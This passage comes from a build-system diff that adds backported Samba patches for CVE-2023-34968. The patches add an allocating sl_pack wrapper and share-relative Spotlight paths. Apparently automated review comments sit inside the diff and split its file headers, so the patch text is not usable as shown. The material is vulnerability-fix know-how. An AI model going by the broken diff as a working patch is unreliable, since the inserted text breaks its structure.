+index a6cc653..0e6a916 100644
+--- a/source3/rpc_server/mdssvc/mdssvc.c
++++ b/source3/rpc_server/mdssvc/mdssvc.c
+@@ -1798,19 +1798,21 @@ bool mds_dispatch(struct mds_ctx *mds_ctx,
+ }
+
+ ok = slcmd->function(mds_ctx, query, reply);
+- if (ok) {
+- DBG_DEBUG("%s", dalloc_dump(reply, 0));
+-
+- len = sl_pack(reply,
+- (char *)response_blob->spotlight_blob,
+- response_blob->size);
+- if (len == -1) {
+- DBG_ERR("error packing Spotlight RPC reply\n");
+- ok = false;
+- goto cleanup;
+- }
+- response_blob->length = len;
++ if (!ok) {
++ goto cleanup;
++ }
++
++ DBG_DEBUG("%s", dalloc_dump(reply, 0));
++
++ len = sl_pack(reply,
++ (char *)response_blob->spotlight_blob,
++ response_blob->size);
++ if (len == -1) {
++ DBG_ERR("error packing Spotlight RPC reply\n");
++ ok = false;
++ goto cleanup;
+ }
++ response_blob->length = len;
+
+ cleanup:
+ talloc_free(query);
+--
+2.40.0
diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0009.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0009.patch
new file mode 100644
index 0000000000..e21f2ba4be
--- /dev/null
+++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0009.patch
@@ -0,0 +1,465 @@ +From cb8313e7bee75454ce29d2b2f657927259298f52 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Mon, 19 Jun 2023 18:16:57 +0200 +Subject: [PATCH] CVE-2023-34968: mdssvc: introduce an allocating wrapper to + sl_pack() + +sl_pack_alloc() does the buffer allocation that previously all callers of +sl_pack() did themselves. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/cb8313e7bee75454ce29d2b2f657927259298f52] + +CVE: CVE-2023-34968 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/rpc_client/cli_mdssvc_util.c | 80 +++++------------------ + source3/rpc_server/mdssvc/marshalling.c | 35 ++++++++-- + source3/rpc_server/mdssvc/marshalling.h | 9 ++- + source3/rpc_server/mdssvc/mdssvc.c | 18 ++--- + source3/rpc_server/mdssvc/mdssvc.h | 5 +- + source3/rpc_server/mdssvc/srv_mdssvc_nt.c | 5 +- + source3/rpcclient/cmd_spotlight.c | 32 ++------- + source4/torture/rpc/mdssvc.c | 24 ++----- + 8 files changed, 80 insertions(+), 128 deletions(-) + +diff --git a/source3/rpc_client/cli_mdssvc_util.c b/source3/rpc_client/cli_mdssvc_util.c +index 892a844..a39202d 100644 +--- a/source3/rpc_client/cli_mdssvc_util.c ++++ b/source3/rpc_client/cli_mdssvc_util.c +@@ -42,7 +42,7 @@ NTSTATUS mdscli_blob_search(TALLOC_CTX *mem_ctx, + sl_array_t *scope_array = NULL; + double dval; + uint64_t uint64val; +- ssize_t len; ++ NTSTATUS status; + int ret; + + d = dalloc_new(mem_ctx); +@@ -209,23 +209,11 @@ NTSTATUS mdscli_blob_search(TALLOC_CTX *mem_ctx, + return NT_STATUS_NO_MEMORY; + } + +- blob->spotlight_blob = talloc_array(mem_ctx, +- uint8_t, +- ctx->max_fragment_size); +- if (blob->spotlight_blob == NULL) { +- TALLOC_FREE(d); +- return NT_STATUS_NO_MEMORY; +- } +- blob->size = ctx->max_fragment_size; +- +- len = sl_pack(d, (char 
*)blob->spotlight_blob, blob->size); ++ status = sl_pack_alloc(mem_ctx, d, blob, ctx->max_fragment_size); + TALLOC_FREE(d); +- if (len == -1) { +- return NT_STATUS_NO_MEMORY; ++ if (!NT_STATUS_IS_OK(status)) { ++ return status; + } +- +- blob->length = len; +- blob->size = len; + return NT_STATUS_OK; + } + +@@ -238,7 +226,7 @@ NTSTATUS mdscli_blob_get_results(TALLOC_CTX *mem_ctx, + uint64_t *uint64p = NULL; + sl_array_t *array = NULL; + sl_array_t *cmd_array = NULL; +- ssize_t len; ++ NTSTATUS status; + int ret; + + d = dalloc_new(mem_ctx); +@@ -293,23 +281,11 @@ NTSTATUS mdscli_blob_get_results(TALLOC_CTX *mem_ctx, + return NT_STATUS_NO_MEMORY; + } + +- blob->spotlight_blob = talloc_array(mem_ctx, +- uint8_t, +- ctx->max_fragment_size); +- if (blob->spotlight_blob == NULL) { +- TALLOC_FREE(d); +- return NT_STATUS_NO_MEMORY; +- } +- blob->size = ctx->max_fragment_size; +- +- len = sl_pack(d, (char *)blob->spotlight_blob, blob->size); ++ status = sl_pack_alloc(mem_ctx, d, blob, ctx->max_fragment_size); + TALLOC_FREE(d); +- if (len == -1) { +- return NT_STATUS_NO_MEMORY; ++ if (!NT_STATUS_IS_OK(status)) { ++ return status; + } +- +- blob->length = len; +- blob->size = len; + return NT_STATUS_OK; + } + +@@ -325,7 +301,7 @@ NTSTATUS mdscli_blob_get_path(TALLOC_CTX *mem_ctx, + sl_array_t *cmd_array = NULL; + sl_array_t *attr_array = NULL; + sl_cnids_t *cnids = NULL; +- ssize_t len; ++ NTSTATUS status; + int ret; + + d = dalloc_new(mem_ctx); +@@ -426,23 +402,11 @@ NTSTATUS mdscli_blob_get_path(TALLOC_CTX *mem_ctx, + return NT_STATUS_NO_MEMORY; + } + +- blob->spotlight_blob = talloc_array(mem_ctx, +- uint8_t, +- ctx->max_fragment_size); +- if (blob->spotlight_blob == NULL) { +- TALLOC_FREE(d); +- return NT_STATUS_NO_MEMORY; +- } +- blob->size = ctx->max_fragment_size; +- +- len = sl_pack(d, (char *)blob->spotlight_blob, blob->size); ++ status = sl_pack_alloc(mem_ctx, d, blob, ctx->max_fragment_size); + TALLOC_FREE(d); +- if (len == -1) { +- return NT_STATUS_NO_MEMORY; ++ 
if (!NT_STATUS_IS_OK(status)) { ++ return status; + } +- +- blob->length = len; +- blob->size = len; + return NT_STATUS_OK; + } + +@@ -455,7 +419,7 @@ NTSTATUS mdscli_blob_close_search(TALLOC_CTX *mem_ctx, + uint64_t *uint64p = NULL; + sl_array_t *array = NULL; + sl_array_t *cmd_array = NULL; +- ssize_t len; ++ NTSTATUS status; + int ret; + + d = dalloc_new(mem_ctx); +@@ -510,22 +474,10 @@ NTSTATUS mdscli_blob_close_search(TALLOC_CTX *mem_ctx, + return NT_STATUS_NO_MEMORY; + } + +- blob->spotlight_blob = talloc_array(mem_ctx, +- uint8_t, +- ctx->max_fragment_size); +- if (blob->spotlight_blob == NULL) { +- TALLOC_FREE(d); +- return NT_STATUS_NO_MEMORY; +- } +- blob->size = ctx->max_fragment_size; +- +- len = sl_pack(d, (char *)blob->spotlight_blob, blob->size); ++ status = sl_pack_alloc(mem_ctx, d, blob, ctx->max_fragment_size); + TALLOC_FREE(d); +- if (len == -1) { +- return NT_STATUS_NO_MEMORY; ++ if (!NT_STATUS_IS_OK(status)) { ++ return status; + } +- +- blob->length = len; +- blob->size = len; + return NT_STATUS_OK; + } +diff --git a/source3/rpc_server/mdssvc/marshalling.c b/source3/rpc_server/mdssvc/marshalling.c +index 441d411..34bfda5 100644 +--- a/source3/rpc_server/mdssvc/marshalling.c ++++ b/source3/rpc_server/mdssvc/marshalling.c +@@ -78,6 +78,7 @@ static ssize_t sl_unpack_loop(DALLOC_CTX *query, const char *buf, + ssize_t offset, size_t bufsize, + int count, ssize_t toc_offset, + int encoding); ++static ssize_t sl_pack(DALLOC_CTX *query, char *buf, size_t bufsize); + + /****************************************************************************** + * Wrapper functions for the *VAL macros with bound checking +@@ -1190,11 +1191,7 @@ static ssize_t sl_unpack_loop(DALLOC_CTX *query, + return offset; + } + +-/****************************************************************************** +- * Global functions for packing und unpacking +- ******************************************************************************/ +- +-ssize_t sl_pack(DALLOC_CTX *query, 
char *buf, size_t bufsize)
++static ssize_t sl_pack(DALLOC_CTX *query, char *buf, size_t bufsize)
+ {
+ ssize_t result;
+ char *toc_buf;
+@@ -1274,6 +1271,34 @@ ssize_t sl_pack(DALLOC_CTX *query, char *buf, size_t bufsize)
+ return len;
+ }
+
++/******************************************************************************
++ * Global functions for packing und unpacking
++ ******************************************************************************/
++
++NTSTATUS sl_pack_alloc(TALLOC_CTX *mem_ctx,
++ DALLOC_CTX *d,
++ struct mdssvc_blob *b,
++ size_t max_fragment_size)
++{
++ ssize_t len;
++
++ b->spotlight_blob = talloc_zero_array(mem_ctx,
++ uint8_t,
++ max_fragment_size);
++ if (b->spotlight_blob == NULL) {
++ return NT_STATUS_NO_MEMORY;
++ }
++
++ len = sl_pack(d, (char *)b->spotlight_blob, max_fragment_size);
++ if (len == -1) {
++ return NT_STATUS_DATA_ERROR;
++ }
++
++ b->length = len;
++ b->size = len;
++ return NT_STATUS_OK;
++}
++
+ bool sl_unpack(DALLOC_CTX *query, const char *buf, size_t bufsize)
+ {
+ ssize_t result;
+diff --git a/source3/rpc_server/mdssvc/marshalling.h b/source3/rpc_server/mdssvc/marshalling.h
+index 086ca74..2cc1b44 100644
+--- a/source3/rpc_server/mdssvc/marshalling.h
++++ b/source3/rpc_server/mdssvc/marshalling.h
+@@ -22,6 +22,9 @@
+ #define _MDSSVC_MARSHALLING_H
+
+ #include "dalloc.h"
++#include "libcli/util/ntstatus.h"
++#include "lib/util/data_blob.h"
++#include "librpc/gen_ndr/mdssvc.h"
+
+ #define MAX_SL_FRAGMENT_SIZE 0xFFFFF
+
+@@ -49,7 +52,11 @@ typedef struct {
+ * Function declarations
+ ******************************************************************************/
+
+-extern ssize_t sl_pack(DALLOC_CTX *query, char *buf, size_t bufsize);
++extern NTSTATUS sl_pack_alloc(TALLOC_CTX *mem_ctx,
++ DALLOC_CTX *d,
++ struct mdssvc_blob *b,
++ size_t max_fragment_size);
++
+ extern bool sl_unpack(DALLOC_CTX *query, const char *buf, size_t bufsize);
+
+ #endif
+diff --git a/source3/rpc_server/mdssvc/mdssvc.c
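Review bot: In `sl_pack_alloc()` the error path after `sl_pack()` returns -1 leaves the freshly allocated buffer attached to `b->spotlight_blob` while `b->length` and `b->size` are never set, so a caller that looks at the blob after a failure sees a pointer with stale size fields. Release it before returning: `TALLOC_FREE(b->spotlight_blob);` ahead of `return NT_STATUS_DATA_ERROR;`. The allocation size is the caller's `max_fragment_size`, which on the server side is now `r->in.max_fragment_size1` taken from the request (see the `_mdssvc_cmd` hunk); a bound against `MAX_SL_FRAGMENT_SIZE` is not visible in these hunks, so confirm it is enforced before this call is reached.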
b/source3/rpc_server/mdssvc/mdssvc.c
+index 0e6a916..19257e8 100644
+--- a/source3/rpc_server/mdssvc/mdssvc.c
++++ b/source3/rpc_server/mdssvc/mdssvc.c
+@@ -1726,11 +1726,11 @@ error:
+ **/
+ bool mds_dispatch(struct mds_ctx *mds_ctx,
+ struct mdssvc_blob *request_blob,
+- struct mdssvc_blob *response_blob)
++ struct mdssvc_blob *response_blob,
++ size_t max_fragment_size)
+ {
+ bool ok;
+ int ret;
+- ssize_t len;
+ DALLOC_CTX *query = NULL;
+ DALLOC_CTX *reply = NULL;
+ char *rpccmd;
+@@ -1738,6 +1738,7 @@ bool mds_dispatch(struct mds_ctx *mds_ctx,
+ const struct smb_filename conn_basedir = {
+ .base_name = mds_ctx->conn->connectpath,
+ };
++ NTSTATUS status;
+
+ if (CHECK_DEBUGLVL(10)) {
+ const struct sl_query *slq;
+@@ -1804,15 +1805,14 @@ bool mds_dispatch(struct mds_ctx *mds_ctx,
+
+ DBG_DEBUG("%s", dalloc_dump(reply, 0));
+
+- len = sl_pack(reply,
+- (char *)response_blob->spotlight_blob,
+- response_blob->size);
+- if (len == -1) {
+- DBG_ERR("error packing Spotlight RPC reply\n");
+- ok = false;
++ status = sl_pack_alloc(response_blob,
++ reply,
++ response_blob,
++ max_fragment_size);
++ if (!NT_STATUS_IS_OK(status)) {
++ DBG_ERR("sl_pack_alloc() failed\n");
+ goto cleanup;
+ }
+- response_blob->length = len;
+
+ cleanup:
+ talloc_free(query);
+diff --git a/source3/rpc_server/mdssvc/mdssvc.h b/source3/rpc_server/mdssvc/mdssvc.h
+index a097991..b3bd8b9 100644
+--- a/source3/rpc_server/mdssvc/mdssvc.h
++++ b/source3/rpc_server/mdssvc/mdssvc.h
+@@ -157,9 +157,10 @@ struct mds_ctx *mds_init_ctx(TALLOC_CTX *mem_ctx,
+ int snum,
+ const char *sharename,
+ const char *path);
+-extern bool mds_dispatch(struct mds_ctx *query_ctx,
++extern bool mds_dispatch(struct mds_ctx *mds_ctx,
+ struct mdssvc_blob *request_blob,
+- struct mdssvc_blob *response_blob);
++ struct mdssvc_blob *response_blob,
++ size_t max_fragment_size);
+ bool mds_add_result(struct sl_query *slq, const char *path);
+
+ #endif /* _MDSSVC_H */
+diff --git a/source3/rpc_server/mdssvc/srv_mdssvc_nt.c
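Review bot: In the `mds_dispatch()` hunk at `@@ -1804,15 +1805,14 @@` the failure branch of `sl_pack_alloc()` drops the old `ok = false;` and only logs before `goto cleanup;`, so `ok` keeps whatever the preceding step left in it. If that value is true at this point, a packing failure is reported to `_mdssvc_cmd` as success although the response blob was never filled in. Restore the assignment by putting `ok = false;` before `goto cleanup;`. The function body continues outside the hunk, so the value of `ok` on entry to this branch should be confirmed there.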
b/source3/rpc_server/mdssvc/srv_mdssvc_nt.c +index 714e6c1..59e2a97 100644 +--- a/source3/rpc_server/mdssvc/srv_mdssvc_nt.c ++++ b/source3/rpc_server/mdssvc/srv_mdssvc_nt.c +@@ -269,7 +269,10 @@ void _mdssvc_cmd(struct pipes_struct *p, struct mdssvc_cmd *r) + /* We currently don't use fragmentation at the mdssvc RPC layer */ + *r->out.fragment = 0; + +- ok = mds_dispatch(mds_ctx, &r->in.request_blob, r->out.response_blob); ++ ok = mds_dispatch(mds_ctx, ++ &r->in.request_blob, ++ r->out.response_blob, ++ r->in.max_fragment_size1); + if (ok) { + *r->out.unkn9 = 0; + } else { +diff --git a/source3/rpcclient/cmd_spotlight.c b/source3/rpcclient/cmd_spotlight.c +index 64fe321..ba3f61f 100644 +--- a/source3/rpcclient/cmd_spotlight.c ++++ b/source3/rpcclient/cmd_spotlight.c +@@ -43,7 +43,6 @@ static NTSTATUS cmd_mdssvc_fetch_properties( + uint32_t unkn3; /* server always returns 0 ? */ + struct mdssvc_blob request_blob; + struct mdssvc_blob response_blob; +- ssize_t len; + uint32_t max_fragment_size = 64 * 1024; + DALLOC_CTX *d, *mds_reply; + uint64_t *uint64var; +@@ -137,20 +136,10 @@ static NTSTATUS cmd_mdssvc_fetch_properties( + goto done; + } + +- request_blob.spotlight_blob = talloc_array(mem_ctx, uint8_t, max_fragment_size); +- if (request_blob.spotlight_blob == NULL) { +- status = NT_STATUS_INTERNAL_ERROR; +- goto done; +- } +- request_blob.size = max_fragment_size; +- +- len = sl_pack(d, (char *)request_blob.spotlight_blob, request_blob.size); +- if (len == -1) { +- status = NT_STATUS_INTERNAL_ERROR; ++ status = sl_pack_alloc(mem_ctx, d, &request_blob, max_fragment_size); ++ if (!NT_STATUS_IS_OK(status)) { + goto done; + } +- request_blob.length = len; +- request_blob.size = len; + + status = dcerpc_mdssvc_cmd(b, mem_ctx, + &share_handle, +@@ -204,7 +193,6 @@ static NTSTATUS cmd_mdssvc_fetch_attributes( + uint32_t unkn3; /* server always returns 0 ? 
*/ + struct mdssvc_blob request_blob; + struct mdssvc_blob response_blob; +- ssize_t len; + uint32_t max_fragment_size = 64 * 1024; + DALLOC_CTX *d, *mds_reply; + uint64_t *uint64var; +@@ -352,22 +340,10 @@ static NTSTATUS cmd_mdssvc_fetch_attributes( + goto done; + } + +- request_blob.spotlight_blob = talloc_array(mem_ctx, +- uint8_t, +- max_fragment_size); +- if (request_blob.spotlight_blob == NULL) { +- status = NT_STATUS_INTERNAL_ERROR; +- goto done; +- } +- request_blob.size = max_fragment_size; +- +- len = sl_pack(d, (char *)request_blob.spotlight_blob, request_blob.size); +- if (len == -1) { +- status = NT_STATUS_INTERNAL_ERROR; ++ status = sl_pack_alloc(mem_ctx, d, &request_blob, max_fragment_size); ++ if (!NT_STATUS_IS_OK(status)) { + goto done; + } +- request_blob.length = len; +- request_blob.size = len; + + status = dcerpc_mdssvc_cmd(b, mem_ctx, + &share_handle, +diff --git a/source4/torture/rpc/mdssvc.c b/source4/torture/rpc/mdssvc.c +index e99c82c..1305456 100644 +--- a/source4/torture/rpc/mdssvc.c ++++ b/source4/torture/rpc/mdssvc.c +@@ -745,11 +745,9 @@ static bool test_sl_dict_type_safety(struct torture_context *tctx, + ok, done, "dalloc_new failed\n"); + request_blob.size = 64 * 1024; + +- request_blob.length = sl_pack(d, +- (char *)request_blob.spotlight_blob, +- request_blob.size); +- torture_assert_goto(tctx, request_blob.length > 0, +- ok, done, "sl_pack failed\n"); ++ status = sl_pack_alloc(tctx, d, &request_blob, 64 * 1024); ++ torture_assert_ntstatus_ok_goto(tctx, status, ok, done, ++ "sl_pack_alloc() failed\n"); + + status = dcerpc_mdssvc_cmd(b, + state, +@@ -836,7 +834,6 @@ static bool test_mdssvc_fetch_attr_unknown_cnid(struct torture_context *tctx, + const char *path_type = NULL; + uint64_t ino64; + NTSTATUS status; +- ssize_t len; + int ret; + bool ok = true; + +@@ -901,19 +898,10 @@ static bool test_mdssvc_fetch_attr_unknown_cnid(struct torture_context *tctx, + ret = dalloc_add(array, cnids, sl_cnids_t); + torture_assert_goto(tctx, 
ret == 0, ret, done, "dalloc_add failed\n"); + +- request_blob.spotlight_blob = talloc_array(state, +- uint8_t, +- max_fragment_size); +- torture_assert_not_null_goto(tctx, request_blob.spotlight_blob, +- ret, done, "dalloc_zero failed\n"); +- request_blob.size = max_fragment_size; +- +- len = sl_pack(d, (char *)request_blob.spotlight_blob, request_blob.size); +- torture_assert_goto(tctx, len != -1, ret, done, "sl_pack failed\n"); +- +- request_blob.length = len; +- request_blob.size = len; + ++ status = sl_pack_alloc(tctx, d, &request_blob, max_fragment_size); ++ torture_assert_ntstatus_ok_goto(tctx, status, ok, done, ++ "sl_pack_alloc() failed\n"); + status = dcerpc_mdssvc_cmd(b, + state, + &state->ph, +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0010.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0010.patch new file mode 100644 index 0000000000..57668f5eef --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0010.patch 
@@ -0,0 +1,484 @@ +From a5c570e262911874e43e82de601d809aa5b1b729 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Sat, 17 Jun 2023 13:53:27 +0200 +Subject: [PATCH] CVE-2023-34968: mdscli: return share relative paths The next + commit will change the Samba Spotlight server to return absolute paths that + start with the sharename as "/SHARENAME/..." followed by the share path + relative appended. +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +So given a share + + [spotlight] + path = /foo/bar + spotlight = yes + +and a file inside this share with a full path of + + /foo/bar/dir/file + +previously a search that matched this file would returns the absolute +server-side pato of the file, ie + + /foo/bar/dir/file + +This will be change to + + /spotlight/dir/file + +As currently the mdscli library and hence the mdsearch tool print out these +paths returned from the server, we have to change the output to accomodate these +fake paths. The only way to do this sensibly is by makeing the paths relative to +the containing share, so just + + dir/file + +in the example above. + +The client learns about the share root path prefix – real server-side of fake in +the future – in an initial handshake in the "share_path" out argument of the +mdssvc_open() RPC call, so the client can use this path to convert the absolute +path to relative. + +There is however an additional twist: the macOS Spotlight server prefixes this +absolute path with another prefix, typically "/System/Volumes/Data", so in the +example above the full path for the same search would be + + /System/Volumes/Data/foo/bar/dir/file + +So macOS does return the full server-side path too, just prefixed with an +additional path. This path prefixed can be queried by the client in the +mdssvc_cmd() RPC call with an Spotlight command of "fetchPropertiesForContext:" +and the path is returned in a dictionary with key "kMDSStorePathScopes". 
Samba +just returns "/" for this. + +Currently the mdscli library doesn't issue this Spotlight RPC +request (fetchPropertiesForContext), so this is added in this commit. In the +end, all search result paths are stripped of the combined prefix + + kMDSStorePathScopes + share_path (from mdssvc_open). + +eg + + kMDSStorePathScopes = /System/Volumes/Data + share_path = /foo/bar + search result = /System/Volumes/Data/foo/bar/dir/file + relative path returned by mdscli = dir/file + +Makes sense? :) + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/a5c570e262911874e43e82de601d809aa5b1b729] + +CVE: CVE-2023-34968 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + python/samba/tests/dcerpc/mdssvc.py | 26 ++-- + source3/rpc_client/cli_mdssvc.c | 155 +++++++++++++++++++++++- + source3/rpc_client/cli_mdssvc_private.h | 4 + + source3/rpc_client/cli_mdssvc_util.c | 68 +++++++++++ + source3/rpc_client/cli_mdssvc_util.h | 4 + + 5 files changed, 243 insertions(+), 14 deletions(-) + +diff --git a/python/samba/tests/dcerpc/mdssvc.py b/python/samba/tests/dcerpc/mdssvc.py +index b0df509..5002e5d 100644 +--- a/python/samba/tests/dcerpc/mdssvc.py ++++ b/python/samba/tests/dcerpc/mdssvc.py +@@ -84,10 +84,11 @@ class MdssvcTests(RpcInterfaceTestCase): + self.t = threading.Thread(target=MdssvcTests.http_server, args=(self,)) + self.t.setDaemon(True) + self.t.start() ++ self.sharepath = os.environ["LOCAL_PATH"] + time.sleep(1) + + conn = mdscli.conn(self.pipe, 'spotlight', '/foo') +- self.sharepath = conn.sharepath() ++ self.fakepath = conn.sharepath() + conn.disconnect(self.pipe) + + for file in testfiles: +@@ -105,12 +106,11 @@ class MdssvcTests(RpcInterfaceTestCase): + self.server.serve_forever() + + def run_test(self, query, expect, json_in, json_out): +- expect = 
[s.replace("%BASEPATH%", self.sharepath) for s in expect] + self.server.json_in = json_in.replace("%BASEPATH%", self.sharepath) + self.server.json_out = json_out.replace("%BASEPATH%", self.sharepath) + + self.conn = mdscli.conn(self.pipe, 'spotlight', '/foo') +- search = self.conn.search(self.pipe, query, self.sharepath) ++ search = self.conn.search(self.pipe, query, self.fakepath) + + # Give it some time, the get_results() below returns immediately + # what's available, so if we ask to soon, we might get back no results +@@ -141,7 +141,7 @@ class MdssvcTests(RpcInterfaceTestCase): + ] + } + }''' +- exp_results = ["%BASEPATH%/foo", "%BASEPATH%/bar"] ++ exp_results = ["foo", "bar"] + self.run_test('*=="samba*"', exp_results, exp_json_query, fake_json_response) + + def test_mdscli_search_escapes(self): +@@ -181,14 +181,14 @@ class MdssvcTests(RpcInterfaceTestCase): + } + }''' + exp_results = [ +- r"%BASEPATH%/x+x", +- r"%BASEPATH%/x*x", +- r"%BASEPATH%/x=x", +- r"%BASEPATH%/x'x", +- r"%BASEPATH%/x?x", +- r"%BASEPATH%/x x", +- r"%BASEPATH%/x(x", +- "%BASEPATH%/x\"x", +- r"%BASEPATH%/x\x", ++ r"x+x", ++ r"x*x", ++ r"x=x", ++ r"x'x", ++ r"x?x", ++ r"x x", ++ r"x(x", ++ "x\"x", ++ r"x\x", + ] + self.run_test(sl_query, exp_results, exp_json_query, fake_json_response) +diff --git a/source3/rpc_client/cli_mdssvc.c b/source3/rpc_client/cli_mdssvc.c +index 07c19b5..a047b91 100644 +--- a/source3/rpc_client/cli_mdssvc.c ++++ b/source3/rpc_client/cli_mdssvc.c +@@ -43,10 +43,12 @@ char *mdscli_get_basepath(TALLOC_CTX *mem_ctx, + struct mdscli_connect_state { + struct tevent_context *ev; + struct mdscli_ctx *mdscli_ctx; ++ struct mdssvc_blob response_blob; + }; + + static void mdscli_connect_open_done(struct tevent_req *subreq); + static void mdscli_connect_unknown1_done(struct tevent_req *subreq); ++static void mdscli_connect_fetch_props_done(struct tevent_req *subreq); + + struct tevent_req *mdscli_connect_send(TALLOC_CTX *mem_ctx, + struct tevent_context *ev, +@@ -111,6 +113,7 
@@ static void mdscli_connect_open_done(struct tevent_req *subreq) + struct mdscli_connect_state *state = tevent_req_data( + req, struct mdscli_connect_state); + struct mdscli_ctx *mdscli_ctx = state->mdscli_ctx; ++ size_t share_path_len; + NTSTATUS status; + + status = dcerpc_mdssvc_open_recv(subreq, state); +@@ -120,6 +123,18 @@ static void mdscli_connect_open_done(struct tevent_req *subreq) + return; + } + ++ share_path_len = strlen(mdscli_ctx->mdscmd_open.share_path); ++ if (share_path_len < 1 || share_path_len > UINT16_MAX) { ++ tevent_req_nterror(req, NT_STATUS_INTERNAL_ERROR); ++ return; ++ } ++ mdscli_ctx->mdscmd_open.share_path_len = share_path_len; ++ ++ if (mdscli_ctx->mdscmd_open.share_path[share_path_len-1] == '/') { ++ mdscli_ctx->mdscmd_open.share_path[share_path_len-1] = '\0'; ++ mdscli_ctx->mdscmd_open.share_path_len--; ++ } ++ + subreq = dcerpc_mdssvc_unknown1_send( + state, + state->ev, +@@ -146,6 +161,8 @@ static void mdscli_connect_unknown1_done(struct tevent_req *subreq) + subreq, struct tevent_req); + struct mdscli_connect_state *state = tevent_req_data( + req, struct mdscli_connect_state); ++ struct mdscli_ctx *mdscli_ctx = state->mdscli_ctx; ++ struct mdssvc_blob request_blob; + NTSTATUS status; + + status = dcerpc_mdssvc_unknown1_recv(subreq, state); +@@ -153,6 +170,108 @@ static void mdscli_connect_unknown1_done(struct tevent_req *subreq) + if (tevent_req_nterror(req, status)) { + return; + } ++ status = mdscli_blob_fetch_props(state, ++ state->mdscli_ctx, ++ &request_blob); ++ if (tevent_req_nterror(req, status)) { ++ return; ++ } ++ ++ subreq = dcerpc_mdssvc_cmd_send(state, ++ state->ev, ++ mdscli_ctx->bh, ++ &mdscli_ctx->ph, ++ 0, ++ mdscli_ctx->dev, ++ mdscli_ctx->mdscmd_open.unkn2, ++ 0, ++ mdscli_ctx->flags, ++ request_blob, ++ 0, ++ mdscli_ctx->max_fragment_size, ++ 1, ++ mdscli_ctx->max_fragment_size, ++ 0, ++ 0, ++ &mdscli_ctx->mdscmd_cmd.fragment, ++ &state->response_blob, ++ &mdscli_ctx->mdscmd_cmd.unkn9); ++ if 
(tevent_req_nomem(subreq, req)) { ++ return; ++ } ++ tevent_req_set_callback(subreq, mdscli_connect_fetch_props_done, req); ++ mdscli_ctx->async_pending++; ++ return; ++} ++ ++static void mdscli_connect_fetch_props_done(struct tevent_req *subreq) ++{ ++ struct tevent_req *req = tevent_req_callback_data( ++ subreq, struct tevent_req); ++ struct mdscli_connect_state *state = tevent_req_data( ++ req, struct mdscli_connect_state); ++ struct mdscli_ctx *mdscli_ctx = state->mdscli_ctx; ++ DALLOC_CTX *d = NULL; ++ sl_array_t *path_scope_array = NULL; ++ char *path_scope = NULL; ++ NTSTATUS status; ++ bool ok; ++ ++ status = dcerpc_mdssvc_cmd_recv(subreq, state); ++ TALLOC_FREE(subreq); ++ state->mdscli_ctx->async_pending--; ++ if (tevent_req_nterror(req, status)) { ++ return; ++ } ++ ++ d = dalloc_new(state); ++ if (tevent_req_nomem(d, req)) { ++ return; ++ } ++ ++ ok = sl_unpack(d, ++ (char *)state->response_blob.spotlight_blob, ++ state->response_blob.length); ++ if (!ok) { ++ tevent_req_nterror(req, NT_STATUS_INTERNAL_ERROR); ++ return; ++ } ++ ++ path_scope_array = dalloc_value_for_key(d, ++ "DALLOC_CTX", 0, ++ "kMDSStorePathScopes", ++ "sl_array_t"); ++ if (path_scope_array == NULL) { ++ DBG_ERR("Missing kMDSStorePathScopes\n"); ++ tevent_req_nterror(req, NT_STATUS_INTERNAL_ERROR); ++ return; ++ } ++ ++ path_scope = dalloc_get(path_scope_array, "char *", 0); ++ if (path_scope == NULL) { ++ DBG_ERR("Missing path in kMDSStorePathScopes\n"); ++ tevent_req_nterror(req, NT_STATUS_INTERNAL_ERROR); ++ return; ++ } ++ ++ mdscli_ctx->path_scope_len = strlen(path_scope); ++ if (mdscli_ctx->path_scope_len < 1 || ++ mdscli_ctx->path_scope_len > UINT16_MAX) ++ { ++ DBG_ERR("Bad path_scope: %s\n", path_scope); ++ tevent_req_nterror(req, NT_STATUS_INTERNAL_ERROR); ++ return; ++ } ++ mdscli_ctx->path_scope = talloc_strdup(mdscli_ctx, path_scope); ++ if (tevent_req_nomem(mdscli_ctx->path_scope, req)) { ++ return; ++ } ++ ++ if (mdscli_ctx->path_scope[mdscli_ctx->path_scope_len-1] == 
'/') {
++ mdscli_ctx->path_scope[mdscli_ctx->path_scope_len-1] = '\0';
++ mdscli_ctx->path_scope_len--;
++ }
++
+
+ tevent_req_done(req);
+ }
+@@ -697,7 +816,10 @@ static void mdscli_get_path_done(struct tevent_req *subreq)
+ struct mdscli_get_path_state *state = tevent_req_data(
+ req, struct mdscli_get_path_state);
+ DALLOC_CTX *d = NULL;
++ size_t pathlen;
++ size_t prefixlen;
+ char *path = NULL;
++ const char *p = NULL;
+ NTSTATUS status;
+ bool ok;
+
+@@ -732,7 +854,38 @@ static void mdscli_get_path_done(struct tevent_req *subreq)
+ tevent_req_nterror(req, NT_STATUS_INTERNAL_ERROR);
+ return;
+ }
+- state->path = talloc_move(state, &path);
++
++ /* Path is prefixed by /PATHSCOPE/SHARENAME/, strip it */
++ pathlen = strlen(path);
++
++ /*
++ * path_scope_len and share_path_len are already checked to be smaller
++ * then UINT16_MAX so this can't overflow
++ */
++ prefixlen = state->mdscli_ctx->path_scope_len
++ + state->mdscli_ctx->mdscmd_open.share_path_len;
++
++ if (pathlen < prefixlen) {
++ DBG_DEBUG("Bad path: %s\n", path);
++ tevent_req_nterror(req, NT_STATUS_INVALID_PARAMETER);
++ return;
++ }
++
++ p = path + prefixlen;
++ while (*p == '/') {
++ p++;
++ }
